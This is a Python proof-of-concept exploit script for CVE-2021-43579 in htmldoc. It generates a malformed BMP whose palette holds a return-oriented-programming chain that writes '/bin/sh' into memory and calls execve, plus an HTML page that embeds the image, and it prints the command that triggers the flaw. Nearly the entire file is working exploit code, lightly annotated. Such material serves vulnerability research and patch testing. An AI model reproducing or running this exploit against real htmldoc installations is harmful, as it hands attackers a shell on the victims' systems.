#!/usr/bin/python3 | |
from pwn import * | |
import sys | |
import os | |
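def long(v=0):
    """Pack *v* as a little-endian 32-bit BMP ``LONG`` field.

    The BMP ``LONG`` fields this script writes (width, height, resolution)
    are signed in the file format, so negative values are encoded in two's
    complement instead of raising ``OverflowError``. Non-negative values,
    including the full unsigned range up to ``2**32 - 1``, are packed
    exactly as before.

    Args:
        v: integer to encode; defaults to 0.

    Returns:
        4 bytes, least significant byte first.

    Raises:
        OverflowError: if *v* does not fit in 32 bits.
    """
    # Only negative inputs take the signed path so existing callers that
    # pass values >= 2**31 keep working.
    return v.to_bytes(4, "little", signed=v < 0)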
def dword(v=0):
    """Encode *v* as a 4-byte little-endian unsigned ``DWORD``.

    Args:
        v: non-negative integer below ``2**32``; defaults to 0.

    Returns:
        4 bytes, least significant byte first.

    Raises:
        OverflowError: if *v* is negative or does not fit in 32 bits.
    """
    return v.to_bytes(length=4, byteorder="little", signed=False)
def word(v=0):
    """Encode *v* as a 2-byte little-endian unsigned ``WORD``.

    Args:
        v: non-negative integer below ``2**16``; defaults to 0.

    Returns:
        2 bytes, least significant byte first.

    Raises:
        OverflowError: if *v* is negative or does not fit in 16 bits.
    """
    return v.to_bytes(length=2, byteorder="little", signed=False)
def getc(v=0):
    """Encode *v* as a single unsigned byte.

    Not referenced anywhere else in this script; kept for interface
    compatibility with the other field helpers.

    Args:
        v: integer in ``0..255``; defaults to 0.

    Returns:
        A 1-byte ``bytes`` object.

    Raises:
        OverflowError: if *v* is negative or exceeds 255.
    """
    return v.to_bytes(length=1, byteorder="little", signed=False)
# --- Flat script body -----------------------------------------------------
# Reproducer for CVE-2021-43579 against a locally built ./htmldoc binary.
# Depends on pwntools (`log`, `ELF`, `ROP`, `p64`) and the little-endian
# field helpers defined above. Produces two files in the working directory:
# poc.bmp (the malformed image) and poc.html (a page that embeds it).
log.info("Generating corrupted BMP image")
# Palette entry count declared in the info header. `total` below is derived
# from it (4 bytes per entry) and sizes the palette region that follows the
# header. The oversized count together with the zeroed size/offset fields
# is what a validating BMP parser or a file scanner can check for.
colors_used = 4096
width = 1
height = 1
depth = 1
header = b"BM"  # BMP magic; prepended to `out` when the file is written
out = bytearray()
# File header after the magic: file size, two reserved words, pixel-data
# offset -- every field is written as 0.
out += dword()
out += word()
out += word()
out += dword()
# Info header; its own size field is also written as 0.
out += dword(0) # info_size
out += long(width) # width
out += long(height) # height
out += word()  # planes
out += word(depth) # depth
out += dword(0) # compression
out += dword(0)  # image size
out += long(0)  # horizontal resolution
out += long(0)  # vertical resolution
out += dword(colors_used) # colors_used
out += dword()  # important colors
offset = 2920  # position of `payload` inside the palette region (see below)
binsh_offset = 32  # NOTE(review): not referenced anywhere in this script
total = colors_used*4  # byte length of the palette region implied by colors_used
filename = "./htmldoc"
# Symbol and gadget addresses are resolved from the local binary, so the
# generated file only matches that particular build.
elf = ELF(filename)
rop = ROP(filename)
# Gadgets
pop_rdi = rop.find_gadget(["pop rdi","ret"]).address
pop_rsi = rop.find_gadget(["pop rsi","ret"]).address
pop_rdx = rop.find_gadget(["pop rdx","ret"]).address
pop_rcx = rop.find_gadget(["pop rcx","ret"]).address
pop_rax = rop.find_gadget(["pop rax","ret"]).address
ret = rop.find_gadget(["ret"]).address
syscall = rop.find_gadget(["syscall"]).address
data_section_base = elf.get_section_by_name('.data').header.sh_addr
log.info('Creating ropchain for writing "/bin/sh" in data section using snprintf')
char_writer = next(elf.search(b"%c")) # %s
binsh = "/bin/sh"
payload = b""
for i in range(len(binsh)):
    payload += p64(pop_rdi) + p64(data_section_base+i) # rdi = .data
    payload += p64(pop_rsi) + p64(2) # rsi = 2
    payload += p64(pop_rdx) + p64(char_writer) # rdx = %c
    payload += p64(pop_rcx) + p64(ord(binsh[i])) # rcx = A
    payload += p64(pop_rax) + p64(0) # rax = 0
    payload += p64(elf.plt["snprintf"])
log.info('Creating ropchain to execute /bin/sh using syscall')
# execve(0, "/bin/sh", 0)
payload += p64(pop_rax) + p64(59) # rax = execve
payload += p64(pop_rdi) + p64(data_section_base) # rdi = .data
payload += p64(pop_rsi) + p64(0) # rsi = 0
payload += p64(pop_rdx) + p64(0) # rdx = 0
payload += p64(ret)
payload += p64(syscall)
# Palette region: `offset` bytes of filler, the payload, then filler up to
# `total`. If len(payload) exceeds total - offset the trailing repeat count
# goes negative and the region comes out short (no check here).
out += b"B" * (offset) + payload + b"D" * (total - offset - len(payload))
# Pixel data: one DWORD per pixel for the declared dimensions.
for _ in range(width * height * depth):
    out += dword(ord("B"))
with open("poc.bmp", "wb") as f:
    f.write(header + out)
log.success("Corrupted BMP image created successfully")
# NOTE(review): the markup closes an <A> element that was never opened.
exploit = '<HTML><BODY><P><IMG SRC="./poc.bmp"></A></BODY></HTML>'
with open("poc.html", "w") as f:
    f.write(exploit)
log.success("poc.html created successfully")
log.info("Exploit: {} --webpage -f out.pdf ./poc.html".format(filename))